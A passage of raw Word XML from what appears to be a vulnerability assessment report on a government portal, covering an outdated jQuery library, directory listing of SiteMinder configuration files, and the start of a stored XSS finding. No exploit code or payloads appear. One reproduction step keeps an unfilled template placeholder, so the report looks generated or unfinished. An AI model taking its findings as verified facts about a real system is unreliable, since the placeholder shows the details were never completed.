              <w:t>CWE-937</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6485115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5656EEB"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F5D07D0"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F017340"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5AF6365" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="3356260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FF786AE"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5F6AB03"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30B57D9"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535FDCA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="376649E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AFE50FC"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97596FB"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F2E074F"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3DB194B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A2E2644" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077EE881" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The application is currently utilizing jQuery version 1.7.0, which is an End-of-Life (EOL) version of the library. This version contains numerous known security vulnerabilities, including potential Cross-Site Scripting (XSS) and Denial of Service (DoS) issues, that have been patched in later releases. Using outdated software components exposes the application to these well-documented flaws, which attackers can exploit to compromise the integrity, confidentiality, or availability of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA62A0" w14:textId="5228BFCB" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65964BB8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Operating with outdated software components, such as the identified jQuery library, introduces significant enterprise risk. From a financial perspective, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an exploited</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability could lead to costly data breaches, system downtime, and extensive incident response efforts. Regulatory compliance, particularly with frameworks like NIST CSF which mandates robust patch management and software integrity, could be severely jeopardized, leading to potential fines, legal action, and increased scrutiny. Reputational damage to the government entity could be substantial, eroding public trust and confidence in its ability to protect sensitive citizen data. Furthermore, the integrity of critical government portal operations could be compromised, leading to unreliable services and potential disruption of essential public functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3C981" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB636C7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):It</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is imperative to establish a comprehensive Software Component Lifecycle Management (SCLM) strategy. This includes implementing a robust process for tracking all third-party libraries and components, subscribing to security advisories for these components, and integrating automated vulnerability scanning into the Continuous Integration/Continuous Deployment (CI/CD) pipeline. A Software Bill of Materials (SBOM) should be maintained for all applications to ensure transparency and timely identification of vulnerable components. Policy updates should mandate the use of only currently supported and patched versions of all software </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dependencies.TACTICAL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIX (Code Implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):Upgrade</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the jQuery library to the latest stable and supported version. If upgrading directly to the latest major version is not immediately feasible due to compatibility concerns, identify the latest secure patch for the current major version or an actively maintained Long-Term Support (LTS) release that addresses known vulnerabilities. Perform thorough testing after the upgrade to ensure no regressions or functional disruptions occur. If the library is loaded from a Content Delivery Network (CDN), implement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Subresource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrity (SRI) to ensure that the fetched resource has not been tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B602CC3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1FEB9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Navigate to the target web application. 2. Open the browser's developer tools (e.g., F12 in Chrome/Firefox). 3. Go to the 'Network' tab and refresh the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>page, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> inspect the 'Sources' tab. 4. Search for 'jquery.js' or similar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>filenames. 5. Examine the source code of the identified jQuery file or its HTTP response headers to determine the exact version number, which is identified as 1.7.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5B66F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E246EC8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://jquery.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BAB9D0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/937.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64771B28" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-ten/2021/A06_2021-Vulnerable_and_Outdated_Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4859A905" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5F657"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590FAE60"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09B83310" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Information Disclosure via Directory Listing of Sensitive Files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7A8B9CEA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49A16BF8"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138006D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0B7F3CA"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C107F66" w14:textId="682976AA"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-015</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FF43EEC"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81EDFE4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="755CA24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1935E37"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D924456"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F5487B5"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8E71D52" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-548</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="30825AD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DCAC001"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634DF5F"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56A26D7"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460CC17" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="377C9DF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3E46EDC"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D7DA598"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846907D"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621BDD6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="65067A1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2C439A3"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CE3EB31"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EC2B3DB"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E7AB88B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4487D7FF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A761839" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The web server hosting the gov portal is configured to allow directory listing for certain directories. Specifically, directories containing SiteMinder configuration files are exposed. This misconfiguration allows an attacker to browse the contents of these directories, revealing file names, structures, and potentially sensitive configuration details within SiteMinder files. Exposure of SiteMinder configuration can lead to the discovery of authentication mechanisms, internal network paths, encryption keys, or other proprietary information, which could be leveraged for further attacks or unauthorized access to protected resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BFA3B" w14:textId="7D87D1C2" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080B73C4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This vulnerability poses a significant risk to the organization's security posture and compliance. The exposure of sensitive configuration files, particularly those related to SiteMinder's access management system, could enable attackers to gain critical insights into the internal architecture and authentication processes. This unauthorized information disclosure could lead to a breach of confidential government data, resulting in severe financial penalties due to non-compliance with regulations such as NIST CSF. Furthermore, a data breach would severely damage the public trust and the organization's reputation, potentially incurring substantial costs for incident response, forensic investigations, and reputation management. The integrity of data and systems could also be compromised if attackers exploit the disclosed information to bypass security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A64E0DF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B13AD78" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a centralized security policy and configuration management system that enforces secure default settings for all web servers across the organization. Ensure that directory listing is explicitly disabled by default in all web server configurations, and access to sensitive files and directories is restricted via strong access control mechanisms. Regularly audit web server configurations against a baseline of secure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>settings.TACTICAL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIX (Code Implementation):1. Disable directory listing on the web server (e.g., Apache, Nginx, IIS) for all public-facing directories, especially those that are not intended for direct file access. For Apache, this involves removing "Indexes" from the Options directive in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>httpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. For Nginx, ensure "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>autoindex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> off;" is set.2. Review and restrict access to directories containing sensitive configuration files, such as those related to SiteMinder. Ensure these files are not located within the web root or are protected by strong access controls (e.g., IP-based restrictions, authentication requirements).3. Remove any SiteMinder or other sensitive configuration files that are unintentionally exposed via directory listing or directly accessible from the web server.4. Implement a deny-by-default approach for all web server access, explicitly allowing only necessary files and directories to be served.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2A1FF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133D7F78" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Open a web browser.2. Navigate to the following URL: [Provide the specific URL or a generic example like "https://govportal.example.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>siteminder_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/"]3. Observe that the web server displays a list of files and subdirectories, including sensitive SiteMinder configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394FCB2D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45325A1C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/548.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7B911" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-ten/2021/A05_2021-Security_Misconfiguration.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E43934D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176A773"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20ADD1F6"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60029C46" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)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5F321DCB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="475C7C58"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1339DBD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21B1BBA"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5038DA8" w14:textId="1BF2D3DF"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-013</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45E2CC4"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BE820A9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.7 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0A85AB0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DB3CF67"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6286567" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021-Injection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6C70918"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B4AE0C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="009CD19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4FFB709"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11DBFA5"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D4DDB96"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EEDB745" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="29C16D7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B21940E"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2399CC6"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7404C68"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8C00660" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6280A3BE"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C921B5D"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C30BF84"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52FE0D4"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8D0EF7E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C168A3C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C21450" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored Cross-Site Scripting (XSS) occurs when a web application collects and stores malicious data from an attacker, which is then unknowingly delivered to other users in an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
